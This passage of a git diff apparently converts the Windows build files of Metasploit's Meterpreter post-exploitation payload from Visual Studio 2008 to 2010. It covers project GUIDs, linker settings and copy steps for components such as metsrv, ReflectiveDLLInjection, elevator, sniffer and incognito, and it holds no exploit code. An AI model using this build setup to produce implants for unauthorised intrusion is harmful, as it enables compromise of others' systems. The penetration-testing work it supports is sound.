+ common.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Release/metcli.exe
+ true
+ ..\common\Release; ..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ ..\..\source\client\metcli.def
+ true
+ .\Release/metcli.pdb
+ Console
+ false
+
+
+ MachineX64
+
+
+ true
+ .\Release/metcli.bsc
+
+
+ copy /y "$(ProjectDir)\release\metcli.exe" "$(ProjectDir)..\..\output\"
+
+
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+ %(PreprocessorDefinitions)
+ Create
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+ %(PreprocessorDefinitions)
+
+
+
+
+
+
+
+
+
+
+
+
+ {c6fb3275-9067-4bba-9206-0a720d2bc64f}
+ false
+
+
+ {9e4de963-873f-4525-a7d0-ce34edbbdcca}
+ false
+
+
+
+
+
+
\ No newline at end of file
diff --git a/external/source/meterpreter/workspace/meterpreter.sln b/external/source/meterpreter/workspace/meterpreter.sln
index 154e783e7c..e272264246 100644
--- a/external/source/meterpreter/workspace/meterpreter.sln
+++ b/external/source/meterpreter/workspace/meterpreter.sln
@@ -1,72 +1,29 @@
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual Studio 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "common", "common\common.vcproj", "{9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}"
+Microsoft Visual Studio Solution File, Format Version 11.00
+# Visual Studio 2010
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "common", "common\common.vcxproj", "{9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_priv", "ext_server_priv\ext_server_priv.vcproj", "{87C64204-C82F-415D-AF45-D0B33BDFE39A}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
- {662AFBB3-F64A-4AD1-8956-B9F1B846231C} = {662AFBB3-F64A-4AD1-8956-B9F1B846231C}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_priv", "ext_server_priv\ext_server_priv.vcxproj", "{87C64204-C82F-415D-AF45-D0B33BDFE39A}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_stdapi", "ext_server_stdapi\ext_server_stdapi.vcproj", "{405245AB-0071-4CB9-BFBE-ED4E2A987EFF}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_stdapi", "ext_server_stdapi\ext_server_stdapi.vcxproj", "{405245AB-0071-4CB9-BFBE-ED4E2A987EFF}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "metcli", "metcli\metcli.vcproj", "{4DECF649-2B11-47A2-908E-031105D706F8}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "metcli", "metcli\metcli.vcxproj", "{4DECF649-2B11-47A2-908E-031105D706F8}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "metsrv", "metsrv\metsrv.vcproj", "{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "metsrv", "metsrv\metsrv.vcxproj", "{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ReflectiveDLLInjection", "ReflectiveDLLInjection\ReflectiveDLLInjection.vcproj", "{72F0246A-A38D-4547-9057-46020E8E503D}"
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ReflectiveDLLInjection", "ReflectiveDLLInjection\ReflectiveDLLInjection.vcxproj", "{72F0246A-A38D-4547-9057-46020E8E503D}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_incognito", "ext_server_incognito\ext_server_incognito.vcproj", "{C427F6B9-C287-4BDA-A5BB-401FC19E207C}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_incognito", "ext_server_incognito\ext_server_incognito.vcxproj", "{C427F6B9-C287-4BDA-A5BB-401FC19E207C}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_boiler", "ext_server_boiler\ext_server_boiler.vcproj", "{488BE203-8407-42D1-B334-8B5C3BC5AB3E}"
- ProjectSection(ProjectDependencies) = postProject
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_boiler", "ext_server_boiler\ext_server_boiler.vcxproj", "{488BE203-8407-42D1-B334-8B5C3BC5AB3E}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_espia", "ext_server_espia\ext_server_espia.vcproj", "{CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_espia", "ext_server_espia\ext_server_espia.vcxproj", "{CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_sniffer", "ext_server_sniffer\ext_server_sniffer.vcproj", "{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_sniffer", "ext_server_sniffer\ext_server_sniffer.vcxproj", "{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "elevator", "elevator\elevator.vcproj", "{662AFBB3-F64A-4AD1-8956-B9F1B846231C}"
- ProjectSection(ProjectDependencies) = postProject
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "elevator", "elevator\elevator.vcxproj", "{662AFBB3-F64A-4AD1-8956-B9F1B846231C}"
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "screenshot", "screenshot\screenshot.vcproj", "{09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}"
- ProjectSection(ProjectDependencies) = postProject
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "screenshot", "screenshot\screenshot.vcxproj", "{09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_pivot", "ext_server_pivot\ext_server_pivot.vcproj", "{C4801040-A3B8-11DF-811F-2A3AE0D72085}"
ProjectSection(ProjectDependencies) = postProject
@@ -75,129 +32,73 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_pivot", "ext_ser
{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
EndProjectSection
EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_lanattacks", "ext_server_lanattacks\ext_server_lanattacks.vcproj", "{2FCCCE33-77E9-43F3-928E-DBF6B9340A62}"
- ProjectSection(ProjectDependencies) = postProject
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA} = {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}
- {72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
- EndProjectSection
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_lanattacks", "ext_server_lanattacks\ext_server_lanattacks.vcxproj", "{2FCCCE33-77E9-43F3-928E-DBF6B9340A62}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "backcompat", "backcompat\backcompat.vcxproj", "{C6FB3275-9067-4BBA-9206-0A720D2BC64F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|Win32 = Debug|Win32
- Debug|x64 = Debug|x64
Release|Win32 = Release|Win32
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Debug|Win32.ActiveCfg = Debug|Win32
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Debug|Win32.Build.0 = Debug|Win32
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Debug|x64.ActiveCfg = Debug|x64
- {9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Debug|x64.Build.0 = Debug|x64
{9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Release|Win32.ActiveCfg = Release|Win32
{9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Release|Win32.Build.0 = Release|Win32
{9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Release|x64.ActiveCfg = Release|x64
{9E4DE963-873F-4525-A7D0-CE34EDBBDCCA}.Release|x64.Build.0 = Release|x64
- {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|Win32.ActiveCfg = Debug|Win32
- {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|Win32.Build.0 = Debug|Win32
- {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|x64.ActiveCfg = Debug|x64
- {87C64204-C82F-415D-AF45-D0B33BDFE39A}.Debug|x64.Build.0 = Debug|x64
{87C64204-C82F-415D-AF45-D0B33BDFE39A}.Release|Win32.ActiveCfg = Release|Win32
{87C64204-C82F-415D-AF45-D0B33BDFE39A}.Release|Win32.Build.0 = Release|Win32
{87C64204-C82F-415D-AF45-D0B33BDFE39A}.Release|x64.ActiveCfg = Release|x64
{87C64204-C82F-415D-AF45-D0B33BDFE39A}.Release|x64.Build.0 = Release|x64
- {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|Win32.ActiveCfg = Debug|Win32
- {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|Win32.Build.0 = Debug|Win32
- {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|x64.ActiveCfg = Debug|x64
- {405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Debug|x64.Build.0 = Debug|x64
{405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Release|Win32.ActiveCfg = Release|Win32
{405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Release|Win32.Build.0 = Release|Win32
{405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Release|x64.ActiveCfg = Release|x64
{405245AB-0071-4CB9-BFBE-ED4E2A987EFF}.Release|x64.Build.0 = Release|x64
- {4DECF649-2B11-47A2-908E-031105D706F8}.Debug|Win32.ActiveCfg = Debug|Win32
- {4DECF649-2B11-47A2-908E-031105D706F8}.Debug|Win32.Build.0 = Debug|Win32
- {4DECF649-2B11-47A2-908E-031105D706F8}.Debug|x64.ActiveCfg = Debug|x64
{4DECF649-2B11-47A2-908E-031105D706F8}.Release|Win32.ActiveCfg = Release|Win32
{4DECF649-2B11-47A2-908E-031105D706F8}.Release|x64.ActiveCfg = Release|x64
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|Win32.ActiveCfg = Debug|Win32
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|Win32.Build.0 = Debug|Win32
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|x64.ActiveCfg = Debug|x64
- {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Debug|x64.Build.0 = Debug|x64
{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Release|Win32.ActiveCfg = Release|Win32
{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Release|Win32.Build.0 = Release|Win32
{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Release|x64.ActiveCfg = Release|x64
{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}.Release|x64.Build.0 = Release|x64
- {72F0246A-A38D-4547-9057-46020E8E503D}.Debug|Win32.ActiveCfg = Release|Win32
- {72F0246A-A38D-4547-9057-46020E8E503D}.Debug|Win32.Build.0 = Release|Win32
- {72F0246A-A38D-4547-9057-46020E8E503D}.Debug|x64.ActiveCfg = Debug|x64
- {72F0246A-A38D-4547-9057-46020E8E503D}.Debug|x64.Build.0 = Debug|x64
{72F0246A-A38D-4547-9057-46020E8E503D}.Release|Win32.ActiveCfg = Release|Win32
{72F0246A-A38D-4547-9057-46020E8E503D}.Release|Win32.Build.0 = Release|Win32
{72F0246A-A38D-4547-9057-46020E8E503D}.Release|x64.ActiveCfg = Release|x64
{72F0246A-A38D-4547-9057-46020E8E503D}.Release|x64.Build.0 = Release|x64
- {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|Win32.ActiveCfg = Debug|Win32
- {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|Win32.Build.0 = Debug|Win32
- {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|x64.ActiveCfg = Debug|x64
- {C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Debug|x64.Build.0 = Debug|x64
{C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Release|Win32.ActiveCfg = Release|Win32
{C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Release|Win32.Build.0 = Release|Win32
{C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Release|x64.ActiveCfg = Release|x64
{C427F6B9-C287-4BDA-A5BB-401FC19E207C}.Release|x64.Build.0 = Release|x64
- {488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Debug|Win32.ActiveCfg = Debug|Win32
- {488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Debug|Win32.Build.0 = Debug|Win32
- {488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Debug|x64.ActiveCfg = Debug|x64
- {488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Debug|x64.Build.0 = Debug|x64
{488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Release|Win32.ActiveCfg = Release|Win32
{488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Release|Win32.Build.0 = Release|Win32
{488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Release|x64.ActiveCfg = Release|x64
{488BE203-8407-42D1-B334-8B5C3BC5AB3E}.Release|x64.Build.0 = Release|x64
- {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|Win32.ActiveCfg = Debug|Win32
- {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|Win32.Build.0 = Debug|Win32
- {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|x64.ActiveCfg = Debug|x64
- {CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|x64.Build.0 = Debug|x64
{CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|Win32.ActiveCfg = Release|Win32
{CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|Win32.Build.0 = Release|Win32
{CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|x64.ActiveCfg = Release|x64
{CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|x64.Build.0 = Release|x64
- {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|Win32.ActiveCfg = Debug|Win32
- {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|Win32.Build.0 = Debug|Win32
- {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|x64.ActiveCfg = Debug|x64
- {BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|x64.Build.0 = Debug|x64
{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|Win32.ActiveCfg = Release|Win32
{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|Win32.Build.0 = Release|Win32
{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|x64.ActiveCfg = Release|x64
{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|x64.Build.0 = Release|x64
- {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|Win32.ActiveCfg = Debug|Win32
- {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|Win32.Build.0 = Debug|Win32
- {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|x64.ActiveCfg = Debug|x64
- {662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Debug|x64.Build.0 = Debug|x64
{662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Release|Win32.ActiveCfg = Release|Win32
{662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Release|Win32.Build.0 = Release|Win32
{662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Release|x64.ActiveCfg = Release|x64
{662AFBB3-F64A-4AD1-8956-B9F1B846231C}.Release|x64.Build.0 = Release|x64
- {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|Win32.ActiveCfg = Debug|Win32
- {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|Win32.Build.0 = Debug|Win32
- {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|x64.ActiveCfg = Debug|x64
- {09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Debug|x64.Build.0 = Debug|x64
{09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|Win32.ActiveCfg = Release|Win32
{09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|Win32.Build.0 = Release|Win32
{09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|x64.ActiveCfg = Release|x64
{09DF8FBC-EDFB-44E6-ACE6-9C0F5A60AB1C}.Release|x64.Build.0 = Release|x64
- {C4801040-A3B8-11DF-811F-2A3AE0D72085}.Debug|Win32.ActiveCfg = Debug|Win32
- {C4801040-A3B8-11DF-811F-2A3AE0D72085}.Debug|Win32.Build.0 = Debug|Win32
- {C4801040-A3B8-11DF-811F-2A3AE0D72085}.Debug|x64.ActiveCfg = Debug|Win32
{C4801040-A3B8-11DF-811F-2A3AE0D72085}.Release|Win32.ActiveCfg = Release|Win32
{C4801040-A3B8-11DF-811F-2A3AE0D72085}.Release|Win32.Build.0 = Release|Win32
{C4801040-A3B8-11DF-811F-2A3AE0D72085}.Release|x64.ActiveCfg = Release|x64
{C4801040-A3B8-11DF-811F-2A3AE0D72085}.Release|x64.Build.0 = Release|x64
- {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|Win32.ActiveCfg = Debug|Win32
- {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|Win32.Build.0 = Debug|Win32
- {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|x64.ActiveCfg = Debug|x64
- {2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Debug|x64.Build.0 = Debug|x64
{2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Release|Win32.ActiveCfg = Release|Win32
{2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Release|Win32.Build.0 = Release|Win32
{2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Release|x64.ActiveCfg = Release|x64
{2FCCCE33-77E9-43F3-928E-DBF6B9340A62}.Release|x64.Build.0 = Release|x64
+ {C6FB3275-9067-4BBA-9206-0A720D2BC64F}.Release|Win32.ActiveCfg = Release|Win32
+ {C6FB3275-9067-4BBA-9206-0A720D2BC64F}.Release|Win32.Build.0 = Release|Win32
+ {C6FB3275-9067-4BBA-9206-0A720D2BC64F}.Release|x64.ActiveCfg = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
diff --git a/external/source/meterpreter/workspace/metsrv/metsrv.vcxproj b/external/source/meterpreter/workspace/metsrv/metsrv.vcxproj
new file mode 100644
index 0000000000..3f220cba27
--- /dev/null
+++ b/external/source/meterpreter/workspace/metsrv/metsrv.vcxproj
@@ -0,0 +1,373 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ Win32
+
+
+ Release
+ x64
+
+
+
+ {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
+ metsrv
+
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+ DynamicLibrary
+ false
+ MultiByte
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <_ProjectFileVersion>10.0.30319.1
+ .\Debug\
+ .\Debug\
+ true
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ true
+ .\Release\
+ .\Release\
+ false
+ false
+ $(Platform)\$(Configuration)\
+ $(Platform)\$(Configuration)\
+ false
+ false
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+ AllRules.ruleset
+
+
+
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ Win32
+ .\Debug/metsrv.tlb
+
+
+
+
+ Disabled
+ ..\..\source\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+ Use
+ metsrv.h
+ .\Debug/metsrv.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ EditAndContinue
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ ws2_32.lib;odbc32.lib;odbccp32.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)
+ .\Debug/metsrv.dll
+ true
+ ..\common\Release; ..\..\source\openssl\lib\win\;%(AdditionalLibraryDirectories)
+ ..\..\source\server\win\metsrv.def
+ true
+ .\Debug/metsrv.pdb
+ false
+
+
+ .\Debug/metsrv.lib
+ MachineX86
+
+
+ true
+ .\Debug/metsrv.bsc
+
+
+ copy /y "$(ProjectDir)\debug\metsrv.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ X64
+ .\Debug/metsrv.tlb
+
+
+
+
+ Disabled
+ ..\..\source\server;..\..\source\openssl\include;%(AdditionalIncludeDirectories)
+ WIN32;_DEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;%(PreprocessorDefinitions)
+ true
+ EnableFastChecks
+ MultiThreadedDLL
+ Use
+ metsrv.h
+ .\Debug/metsrv.pch
+ .\Debug/
+ .\Debug/
+ .\Debug/
+ Level3
+ true
+ ProgramDatabase
+
+
+ _DEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ common.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
+ .\Debug/metsrv.dll
+ true
+ ..\common\Release; ..\..\source\openssl\lib\win\;%(AdditionalLibraryDirectories)
+ ..\..\source\server\win\metsrv.def
+ true
+ .\Debug/metsrv.pdb
+ false
+
+
+ .\Debug/metsrv.lib
+ MachineX64
+
+
+ true
+ .\Debug/metsrv.bsc
+
+
+ copy debug\metsrv.dll ..\..\output\server
+
+
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ Win32
+ .\Release/metsrv.tlb
+
+
+
+
+ MinSpace
+ OnlyExplicitInline
+ Size
+ ..\..\source\openssl\include;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ false
+ MultiThreaded
+ false
+ Create
+ metsrv.h
+ .\Release/metsrv.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)
+ .\Release\metsrv.dll
+ true
+ ..\backcompat\Release;..\common\Release; ..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)
+ ..\..\source\server\win\metsrv.def
+ %(DelayLoadDLLs)
+ false
+ true
+ .\Release/metsrv.map
+ false
+
+
+ .\Release/metsrv.lib
+ MachineX86
+ 5.0
+ Console
+
+
+ true
+ .\Release/metsrv.bsc
+
+
+ copy /y "$(ProjectDir)\release\metsrv.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ true
+ true
+ X64
+ .\Release/metsrv.tlb
+
+
+
+
+ MinSpace
+ OnlyExplicitInline
+ Size
+ ..\..\source\openssl\include;..\..\source\server;%(AdditionalIncludeDirectories)
+ WIN32;NDEBUG;_WINDOWS;_USRDLL;METSRV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+ false
+ Create
+ metsrv.h
+ .\Release/metsrv.pch
+ .\Release/
+ .\Release/
+ .\Release/
+ Level3
+ true
+ ProgramDatabase
+ false
+
+
+ NDEBUG;%(PreprocessorDefinitions)
+ 0x0409
+
+
+ ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)
+ .\Release\metsrv.x64.dll
+ true
+ ..\common\Release;..\..\source\openssl\lib\win\x64;%(AdditionalLibraryDirectories)
+ ..\..\source\server\win\metsrv.def
+ false
+ true
+ .\Release/metsrv.map
+ false
+
+
+ .\Release/metsrv.lib
+ MachineX64
+
+
+
+
+ true
+ .\Release/metsrv.bsc
+
+
+ copy /y "$(ProjectDir)\release\metsrv.x64.dll" "$(ProjectDir)..\..\output\"
+
+
+
+
+ %(PreprocessorDefinitions)
